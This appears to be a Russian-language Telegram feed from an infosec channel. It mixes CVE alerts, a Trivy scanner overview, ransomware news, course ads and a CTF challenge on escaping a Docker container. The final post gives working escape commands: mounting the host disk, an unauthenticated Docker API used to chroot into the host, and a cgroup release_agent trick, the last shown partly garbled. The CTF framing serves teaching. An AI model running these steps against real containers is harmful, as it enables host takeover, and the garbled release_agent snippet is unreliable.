Zero-day уязвимость CVE-2025-64446 УЖЕ эксплуатируется хакерами в реальных атаках.
Path Traversal → чтение любых файлов системы → удалённое выполнение кода
⚠️ Если у вас FortiWeb — вы под ударом ПРЯМО СЕЙЧАС
— Накатить патч немедленно
— Закрыть админку от внешнего доступа
— Проверить логи на следы взлома
#cve_bulletin
Please open Telegram to view this post
VIEW IN TELEGRAM
👾7❤2⚡2🥰1
A) Из своего SIEM в реальном времени
B) Пользователь написал «что-то тормозит»
C) Банк заблокировал карту компании
D) Хакеры сами написали в поддержку
#ask_the_community
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🥰2🤔1
🔥5
Один инструмент для поиска всего: уязвимостей в контейнерах, секретов в коде, misconfigurations в Kubernetes и IaC. Сканирует образы, файлы, репозитории и даже целые кластеры.
— Находит CVE в OS-пакетах и зависимостях (Python, Node.js, Java, Go и ещё 20+ языков)
— Генерирует SBOM (CycloneDX, SPDX) для supply chain security
— Ловит секреты (API keys, tokens, credentials) в коде и образах
— Проверяет IaC на ошибки конфигурации (Terraform, K8s YAML, Dockerfiles)
— Сканирует Kubernetes кластеры и генерирует KBOM
— Работает локально, в CI/CD, интегрируется с GitHub Security, Harbor, GitLab
# Проверить Docker-образ
trivy image nginx:latest
# Сгенерировать SBOM
trivy image --format cyclonedx -o sbom.json myapp:latest
# Найти секреты в репозитории
trivy fs --scanners secret ./
# Проверить Kubernetes кластер
trivy k8s cluster
💡 Зачем нужно:
DevSecOps без боли. Вместо десятка разных инструментов — один Trivy. Быстрый (секунды), точный (низкий false-positive), бесплатный. Один скан → видишь все риски: от outdated библиотек до hardcoded паролей.
#tool_of_the_week
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤5🥰2🔥1🤔1
Подборка ключевых событий, которые стоит держать в поле зрения
Новый цикл обновлений улучшает веб-совместимость и работу на мобильных платформах.
Microsoft выпустила обновления, закрывающие 63 уязвимости, включая нулевой день CVE-2025-62215.
VPN-инфраструктура теперь — бесплатный банкомат для хакеров
Фильтры безопасности рухнули после одного невинного предложения
Рынок кибербезопасности вырос на 26,3%, обогнав даже IT-сектор.
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🥰2👍1
⚠️ Глобальный сбой Cloudflare
У Cloudflare сегодня произошёл масштабный инцидент, затронувший множество популярных сервисов по всему миру. Компания сообщила, что знает о проблеме и работает над восстановлением.
📉 Что пострадало:
Spotify, «Яндекс Музыка», X, Amazon-сервисы, OpenAI/ChatGPT и другие ресурсы, использующие Cloudflare для DNS, CDN и защиты.
Сбой начался вскоре после плановых работ в дата-центре Сантьяго. Напомним: через Cloudflare проходит около 20% мирового веб-трафика.
🎥 Компания обещает обновления по мере устранения неполадок.
🐸 Библиотека хакера
#patch_notes
У Cloudflare сегодня произошёл масштабный инцидент, затронувший множество популярных сервисов по всему миру. Компания сообщила, что знает о проблеме и работает над восстановлением.
Spotify, «Яндекс Музыка», X, Amazon-сервисы, OpenAI/ChatGPT и другие ресурсы, использующие Cloudflare для DNS, CDN и защиты.
Сбой начался вскоре после плановых работ в дата-центре Сантьяго. Напомним: через Cloudflare проходит около 20% мирового веб-трафика.
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🤔2
🎓 Экспресс-курс «Математика для Data Science» стартует 4 декабря
Этот курс для вас, если вы:
🧑💻 Программист
Когда нужно понять, что происходит «под капотом» ML-алгоритмов.
📊 Начинающий DS / аналитик / студент
Чтобы закрыть теорию, подтянуть фундамент и собрать портфолио.
📈 Смежный специалист
Чтобы уверенно работать с моделями, статистикой и гипотезами.
🎁 Сейчас лучший момент стартовать:
— скидка 40% на курс до конца ноября
— можно пройти бесплатный тест на знание основ математики
👉 Записаться на курс
Этот курс для вас, если вы:
🧑💻 Программист
Когда нужно понять, что происходит «под капотом» ML-алгоритмов.
📊 Начинающий DS / аналитик / студент
Чтобы закрыть теорию, подтянуть фундамент и собрать портфолио.
📈 Смежный специалист
Чтобы уверенно работать с моделями, статистикой и гипотезами.
🎁 Сейчас лучший момент стартовать:
— скидка 40% на курс до конца ноября
— можно пройти бесплатный тест на знание основ математики
👉 Записаться на курс
👍5
Ransomware-группа MyData заявила о взломе тайской фабрики Bangkok Eagle Wings Co., Ltd. и краже массива внутренних данных. Атака вписывается в новый тренд 2025 года — переход вымогателей в промышленный сектор.
— внутренние документы, закупочные ведомости, спецификации;
— данные сотрудников и контрагентов;
— сбои на производственных линиях;
— репутационный ущерб от потенциальной публикации данных.
— вход через уязвимые VPN, проброшенные RDP или забытые сервисы в DMZ;
— exfiltration-first: сначала вытаскивают данные, потом шифруют;
— автоматическое отключение антивирусов и бэкапов;
— двойное давление: leak-сайт + рассылка угроз партнёрам компании.
В промышленности любой простой = прямые убытки. Это делает заводы и фабрики не менее привлекательной целью, чем финансы или ритейл.
#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥4👍1
tcp:udp.jpeg
146.8 KB
Это короткий ориентир по основным портам: какие сервисы за ними стоят и чем они могут быть полезны в работе.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥7👍2🔥2🤔2
Сценарий: вы получили RCE в веб-приложении, которое работает в Docker-контейнере. У вас есть shell от пользователя
www-data внутри контейнера.Цель — выбраться на хост-систему и прочитать
/host/root/flag.txt.🔥 — Mount host disk: смонтировать
/dev/sda1 и читать файлы хоста напрямую👾 — Docker API abuse: подключиться к
tcp://172.17.0.1:2375 и запустить новый контейнер с volume хоста❤️ — Namespace escape: через
/proc/1/root попытаться получить доступ к init-процессу хоста#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
👾12❤5🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🥰4👾2🤔1
🔥 Выучи математику за 60 дней!
Чем важна математика расскажет Мария Тихонова - кандидат компьютерных наук, руководитель исследовательского направления SberAI, доцент факультета компьютерных наук и преподаватель НИУ ВШЭ на курсе «Математика для Data Science» от Proglib Academy.
👀 Мария - человек, который реально работает с LLM и делает так, чтобы модели понимали человеческую речь, а не делали вид.
Что еще внутри курса:
👇 👇 👇
Записаться на курс
Чем важна математика расскажет Мария Тихонова - кандидат компьютерных наук, руководитель исследовательского направления SberAI, доцент факультета компьютерных наук и преподаватель НИУ ВШЭ на курсе «Математика для Data Science» от Proglib Academy.
Что еще внутри курса:
- живые вебинары, на которых можно задать вопросы спикерам
- доступ к материалам в записи, если не успели на лекцию и чат
- 3 задания с практикой на Python и финальный проект с подробной обратной связью от экспертов курса
- актуальные знания: программа разработана в ноябре 2025г.
- программа без воды - 2 месяца только самого нужного для старта
- для старта нужны всего лишь знания школьной математики и основы Python
- скидка 40% до 30 ноября
- если оплатить до конца ноября, получите курс «Базовая математика» в подарок
Записаться на курс
Please open Telegram to view this post
VIEW IN TELEGRAM
👏4🌚3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9❤3🔥2
На конференции Ignite 2025 показали Agent 365 — такой «диспетчерский пункт» для всех ИИ-агентов в компании.
Простыми словами: один интерфейс, где видно всех ботов, их права доступа, что они делают и кто за ними следит.
Представьте: у вас в компании бот с доступом к базе клиентов. Ему пишут: «Выгрузи всех клиентов с выручкой больше миллиона за квартал»
Бот выполняет. Но вопросы остаются:
→ Кто спросил?
→ Можно ли ему эти данные?
→ Куда улетела выгрузка?
Agent 365 помогает это отследить. Но правила «кому можно, а кому нет» — настраивать всё равно вам.
Сталкивались с ИИ-агентами на проектах? Как защищаете?
🔹 Основы IT для непрограммистов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🥰2🔥1
Что он делал:
— крал исходники операционок (Sun, Digital Equipment);
— клонировал мобильные телефоны для бесплатных звонков;
— вскрывал корпоративные сети через доверчивых секретарей.
Правительство держало его 8 месяцев в одиночке БЕЗ суда — якобы он мог "взломать NORAD свистом по телефону". Это была паранойя 90-х, когда никто не понимал, что возможно, а что — голливудская фантастика.
Сейчас ему ставят памятники компании, которые он когда-то взламывал
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🔥3💯3
This media is not supported in your browser
VIEW IN TELEGRAM
🤔3🥰2
🤖 AI сейчас на пике — и математика снова в центре внимания.
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
«На конференции AIJ только и разговоров, что о AI и математике. Ведь в основе генеративных моделей Gen AI лежит фундаментальная математика.»
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
❤3🥰2
Правильный ответ: ВСЕ ТРИ работают, но с нюансами!
Почему работает:
Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.
Эксплойт:
Шаг 1: Смотрим доступные диски
fdisk -l
Видим /dev/sda1 (корень хоста)
Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host
Шаг 3: Профит!
cat /mnt/host/root/flag.txt
Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.
Эксплойт:
Проверяем доступ к API
curl https://172.17.0.1:2375/version
Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
-it alpine chroot /host sh
Теперь мы root на хосте!
cat /root/flag.txt
Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.
Эксплойт:
Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp
Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release
Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent
Создаём команду
cat /root/flag.txt > /output
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2